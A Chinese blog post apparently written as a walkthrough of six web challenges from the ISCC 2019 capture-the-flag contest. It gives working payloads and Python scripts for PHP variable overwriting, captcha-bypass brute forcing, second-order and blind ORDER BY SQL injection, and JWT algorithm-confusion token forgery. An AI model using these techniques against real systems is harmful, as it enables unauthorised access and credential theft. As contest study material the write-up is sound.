<!DOCTYPE html>
<html lang="zh-CN">










<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="author" content="chuddy">
    <meta name="keywords" content="">
    <title>2019ISCC wp ~ chuddy&#39;s Blog</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.7.2/css/all.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/mdb.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_vr10bjtg3us.css">
    
        <link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">
    
</head>

<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/"><strong>chuddy&#39;s Blog</strong></a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2" style='background: url("/post.jpg")no-repeat center center;background-size: cover;'>
    <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
        <div class="container text-center white-text wow fadeInUp">
            <p class="h2">2019ISCC wp</p>
            <br>
            
            <p>Monday, May 27th 2019, 7:55 pm</p>
            
        </div>
        </div>
    </div>
    </div>
  </header>

  <main>
  
  <div class="container-fluid">
    <div class="row">
        <div class="col-md-8 offset-md-2 ">
            <div class="post-content py-5 z-depth-3 main">
                <h1 id="ISCC-2019-web"><a href="#ISCC-2019-web" class="headerlink" title="ISCC 2019 web"></a>ISCC 2019 web</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这一段做了iscc的比赛题目，在此记录一下<br><a id="more"></a></p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h3><p>地址：<a href="http://39.100.83.188:8066/" target="_blank" rel="noopener">http://39.100.83.188:8066/</a><br>打开题目：发现直接显示源码，于是审计一波：</p>
<pre><code>&lt;?php 
error_reporting(0); 
include(&quot;flag.php&quot;); 
$hashed_key = &#39;ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a&#39;; 
$parsed = parse_url($_SERVER[&#39;REQUEST_URI&#39;]); 
if(isset($parsed[&quot;query&quot;])){ 
    $query = $parsed[&quot;query&quot;]; 
    $parsed_query = parse_str($query); 
    if($parsed_query!=NULL){ 
        $action = $parsed_query[&#39;action&#39;]; 
    } 

    if($action===&quot;auth&quot;){ 
        $key = $_GET[&quot;key&quot;]; 
        $hashed_input = hash(&#39;sha256&#39;, $key); 
        if($hashed_input!==$hashed_key){ 
            die(&quot;&lt;img src=&#39;cxk.jpg&#39;&gt;&quot;); 
        } 

        echo $flag; 
    } 
}else{ 
    show_source(__FILE__); 
}?&gt;
</code></pre><p>代码审计一波：发现了当传入的参数中 <code>action</code> 为<code>auth</code>，并且<code>key</code>和<code>hashed_key</code> 相等时，就给出 flag。</p>
<p>但是通过关键代码的分析 发现了存在变量覆盖的可能</p>
<pre><code>$parsed = parse_url($_SERVER[&#39;REQUEST_URI&#39;]); 
if(isset($parsed[&quot;query&quot;])){ 
    $query = $parsed[&quot;query&quot;]; 
    $parsed_query = parse_str($query); 
    if($parsed_query!=NULL){ 
        $action = $parsed_query[&#39;action&#39;]; 
    } 
</code></pre><p>函数<code>parse_url</code>和函数<code>parse_str</code>的配合使用可以实现变量覆盖</p>
<p>parse_url函数<br><img src="https://s2.ax1x.com/2019/05/28/Vmceqf.png" alt=""></p>
<p>parse_str函数作用<br><img src="https://s2.ax1x.com/2019/05/28/Vm6H54.md.png" alt="Vm6H54.md.png"></p>
<p>我们可以覆盖<code>$hashed_key</code>的值,为我们所控制的，</p>
<pre><code>&lt;?php 
$hashed_input = hash(&#39;sha256&#39;, &#39;chuddy&#39;);
echo  $hashed_input;
 ?&gt;


输出为：2b2714f1209077f1dc46756d01efd7610469b75c74182b5aa0126d50baaef96e
</code></pre><p>于是构建payload：</p>
<pre><code>http://39.100.83.188:8066/?action=auth&amp;hashed_key=2b2714f1209077f1dc46756d01efd7610469b75c74182b5aa0126d50baaef96e&amp;key=chuddy
</code></pre><p>就可以得到flag</p>
<h3 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h3><p>打开题目：<br><img src="https://s2.ax1x.com/2019/05/28/VmgAkF.png" alt="VmgAkF.png"></p>
<p>感觉像是暴力破解但是因为存在验证码，所以需要想办法绕过验证码的限制。</p>
<p>查看源码发现，该题目是通过php来写的验证码页面，猜测验证码的正确值可能会存在<code>session</code>当中。如果我们把<code>session</code>值删除，那么存在里面的验证码也就不存在了，再将传递的<code>user_code</code>的值设置为空就可以绕过验证码，</p>
<p>脚本：</p>
<pre><code>#coding=utf-8
import requests
import sys

reload(sys)
sys.setdefaultencoding(&quot;utf8&quot;)
data = {
    &#39;Cookie&#39;: &#39;&#39;
}
url=&#39;http://39.100.83.188:8002/login.php&#39;
for x in xrange(0,10):
    for a in xrange(0,10):
        for i in xrange(0,10):
            data={
                &#39;username&#39;:&#39;admin&#39;,
                &#39;pwd&#39;: str(x)+str(a)+str(i),
                &#39;user_code&#39;:&#39;&#39;,
                &#39;submit&#39;:&#39;submit&#39;
            }
            res=requests.post(url,data=data)
            print str(x)+str(a)+str(i)
            if &quot;å¯ç éè¯¯&quot; not in res.text:
                print str(x)+str(a)+str(i)
                print res.text
                break
</code></pre><p>得到flag 以及密码996</p>
<h3 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h3><p>打开题目：</p>
<pre><code> &lt;?php
error_reporting(0);
require &#39;flag.php&#39;;
$value = $_GET[&#39;value&#39;];
$password = $_GET[&#39;password&#39;];
$username = &#39;&#39;;

for ($i = 0; $i &lt; count($value); ++$i) {
    if ($value[$i] &gt; 32 &amp;&amp; $value[$i] &lt; 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == &#39;w3lc0me_To_ISCC2019&#39; &amp;&amp; intval($password) &lt; 2333 &amp;&amp; intval($password + 1) &gt; 2333) {
        echo &#39;Hello &#39;.$username.&#39;!&#39;, &#39;&lt;br&gt;&#39;, PHP_EOL;
        echo $flag, &#39;&lt;hr&gt;&#39;;
    }
}

highlight_file(__FILE__);

</code></pre><p>代码审计一下：<br>从get传参获取两个变量值<code>value</code>和<code>password</code></p>
<p><code>value</code>为一个数组，其中里面只能为数组 如果在32和127之间就会被unset处理，其他的会转字符串存入用户名中，然后判断用户名是否为 w3lc0me_To_ISCC2019，再判断用 intval 之后的 password 是否小于 2333， intval 之后的 password + 1 是否大于 2333。</p>
<p>php的chr函数会对传入的值和256取模，于是我们可以传递一个比原来大256的数来进行绕过</p>
<p>可以写个脚本生成payload：</p>
<pre><code>stra = &#39;w3lc0me_To_ISCC2019&#39;
j=0
value = []
for i in stra:
    value.append(ord(i)+256)

str1 = &quot;&quot;

for i in range(len(value)):
    str1 += &quot;value[&quot;+str(i)+&quot;]=&quot;+str(value[i])+&quot;&amp;&quot;

print str1


value[0]=375&amp;value[1]=307&amp;value[2]=364&amp;value[3]=355&amp;value[4]=304&amp;value[5]=365&amp;value[6]=357&amp;value[7]=351&amp;value[8]=340&amp;value[9]=367&amp;value[10]=351&amp;value[11]=329&amp;value[12]=339&amp;value[13]=323&amp;value[14]=323&amp;value[15]=306&amp;value[16]=304&amp;value[17]=305&amp;value[18]=313
</code></pre><p>至于password参数可以对其进行16进制编码绕过或者科学记数法绕过。</p>
<p>最终payload为：</p>
<pre><code>http://39.100.83.188:8001/?value[0]=375&amp;value[1]=307&amp;value[2]=364&amp;value[3]=355&amp;value[4]=304&amp;value[5]=365&amp;value[6]=357&amp;value[7]=351&amp;value[8]=340&amp;value[9]=367&amp;value[10]=351&amp;value[11]=329&amp;value[12]=339&amp;value[13]=323&amp;value[14]=323&amp;value[15]=306&amp;value[16]=304&amp;value[17]=305&amp;value[18]=313&amp;password=1e9
</code></pre><p>即可得到flag。</p>
<h3 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h3><p>sqli-labs上的一个原题利用到了二次注入。</p>
<p>打开页面发现需要注册账号进行登陆：<br>于是随便注册一个账号登陆进去发现存在修改密码的功能，于是想到了二次注入。</p>
<p>注册一个用户名为<code>admin&#39;--</code>的账号登陆之后更改密码后台的sql语句可能为：<br>update users set password=’1234561 where username=’admin’– ‘</p>
<p>就可以修改管理员的账号密码了，<br>进行登陆管理员的账号就得到了flag</p>
<h3 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h3><p>这是一道原题 参考了一叶飘零大佬写的文章<a href="https://www.anquanke.com/post/id/145540" target="_blank" rel="noopener">文章地址</a></p>
<p>打开页面登陆进去，没什么思路，于是抓包看了一下：</p>
<p><img src="https://s2.ax1x.com/2019/05/28/Vm4Sl4.md.png" alt="Vm4Sl4.md.png"></p>
<p>发现了jwt的代码</p>
<pre><code>eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiY2h1ZGR5IiwicHJpdiI6Im90aGVyIn0.VbwW1bhJ4555jrZw4PJeo1_h3QVQ3M0pUCeSkhu4Y6Z5JL8sSgVBL2Z6EeNDMBWBHy_Ps1WNPVeW1grFE4oH6n3dl7Qh8qsvFbqM3FMmNUwSaQhbjycLMVgHHwq2BbRG0qZoX9G8Fyr-uSLfxK9N18vOcKMirHpju0-qpVOR5gU
</code></pre><p>于是尝试解码：<br><img src="https://s2.ax1x.com/2019/05/28/Vm4Q0I.md.png" alt="Vm4Q0I.md.png"></p>
<p>通过查看源代码 发现/static/js/common.js后面有一段代码</p>
<pre><code>function getpubkey(){
    /* 
    get the pubkey for test
    /pubkey/{md5(username+password)}
    */
}
</code></pre><p>尝试构造一个访问，查了我的用户名加密码的MD5值为：68c623464e8a37ddeb9632fb3ccbe82f</p>
<p>访问 /pubkey/68c623464e8a37ddeb9632fb3ccbe82f<br>发现：<br><img src="https://s2.ax1x.com/2019/05/28/Vm5C8S.md.png" alt="Vm5C8S.md.png"></p>
<p>内容为：</p>
<pre><code>-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK\nomh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h\nKk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc\nIC+LX+9V/mpyKe9R3wIDAQAB\n-----END PUBLIC KEY-----
</code></pre><p>将这个文件存入txt文件内：</p>
<pre><code>-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK
omh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h
Kk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc
IC+LX+9V/mpyKe9R3wIDAQAB
-----END PUBLIC KEY-----
</code></pre><p>那么我们来尝试更改一下 alg 所指代的算法，将其从 RS256 这种非对称加密改成 HS256 这种对称加密，这样我们有公钥就可以伪造 JWT Token 从而为所欲为了。<br>用 Python 脚本来伪造令牌，payload 部分填写自己想要的内容。</p>
<pre><code>import jwt
import base64
public = open(&#39;2.txt&#39;, &#39;r&#39;).read()

print jwt.encode({&quot;name&quot;: &quot;chuddy&quot;,&quot;priv&quot;: &quot;admin&quot;}, key=public, algorithm=&#39;HS256&#39;)
</code></pre><p>运行发现报错了。<br>直接去库源码里面把报错的那一段注释掉。简单粗暴</p>
<p>再次运行就会得到JWT TOKEN了</p>
<p>然后抓包更改session：</p>
<p><img src="https://s2.ax1x.com/2019/05/28/Vm5vM4.md.png" alt="Vm5vM4.md.png"></p>
<p>得到了admin的留言地址，访问就会得到flag</p>
<h3 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h3><p>打开链接发现：</p>
<p><img src="https://s2.ax1x.com/2019/05/28/Vm5xsJ.md.png" alt="Vm5xsJ.md.png"></p>
<p>猜测是修改header头来进行绕过的，经过尝试发现添加</p>
<pre><code>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Union.373
</code></pre><p>提示我要输入用户名：<br>于是post传递username=chuddy</p>
<p>又提示我需要输入密码：<br>于是post传递password=chuddy</p>
<p>得到</p>
<p><img src="https://s2.ax1x.com/2019/05/28/VmI1W8.md.png" alt="VmI1W8.md.png"></p>
<p>通过尝试得到了用户名<code>union_373_Tom</code></p>
<p><img src="https://s2.ax1x.com/2019/05/28/VmIUwn.md.png" alt="VmIUwn.md.png"></p>
<p>这道题过滤了好多敏感字符串，尝试了一下发现可以通过order by注入得到密码</p>
<pre><code>当传递的参数为：
username=union_373_Tom&#39;/*&amp;password=*/ union select 1,2,&#39;1&#39; order by 3,2,&#39;1


返回为：
组织欢迎你，2!



当传递的参数为：
username=union_373_Tom&#39;/*&amp;password=*/ union select 1,2,&#39;2&#39; order by 3,2,&#39;1
返回为：
组织欢迎你，union_373_Tom!
</code></pre><p>于是可以尝试使用脚本来跑：</p>
<pre><code>#coding=utf-8
import requests

head = {
    &#39;User-Agent&#39;: &#39;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Union.373&#39;
}
url=&#39;http://39.100.83.188:8054/&#39;
# res=requests.post(url,headers=data)
# print res.content
password = &quot;&quot;
for i in range(10):
    for j in range(33,128):
        data={
            &#39;username&#39;:&quot;union_373_Tom&#39;/*&quot;,
            &#39;password&#39;: &quot;*/ union select 1,2,\&quot;&quot;+password+chr(j)+&quot;\&quot; order by 3,2,&#39;1&quot;

        }
        print j
        res=requests.post(url,data=data,headers=head)
        # print res.content
        if &#39;union_373_Tom&#39; in res.content:
            password += chr(j-1)
            print password
            break

</code></pre><p>即可得到密码，就是flag</p>
<p>感觉这次iscc的题目不是特别难，而且还有好多原题，感觉自己还是很菜。</p>

                <hr>
                <div>
                    <p>
                         
                        <span class="badge badge-light">#&nbsp;writeup</span>
                        &nbsp;
                        
                    </p>
                </div>
                <br>
                
            </div>
        </div>
        <div class="d-none d-md-block col-md-2">
            
  <div id="toc" class="py-5">
    <p class="h6"><i class="iconfont icon-toc" style="vertical-align:middle"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>        
</div>

<br><br><br>

<!-- Comments -->
<div class="comments" id="comments">
 
</div>
  
  </main>

<footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank"><b>HEXO</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/jquery-3.3.1.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/bootstrap.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/mdb.min.js"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    
    <script src="/js/post.js"></script>
    
      <script src="/js/plugins/prettify.js"></script>
      <script>
          $(document).ready(function(){
              $('pre').addClass('prettyprint linenums');
              prettyPrint();
          })
      </script>
    
  
</body>
</html>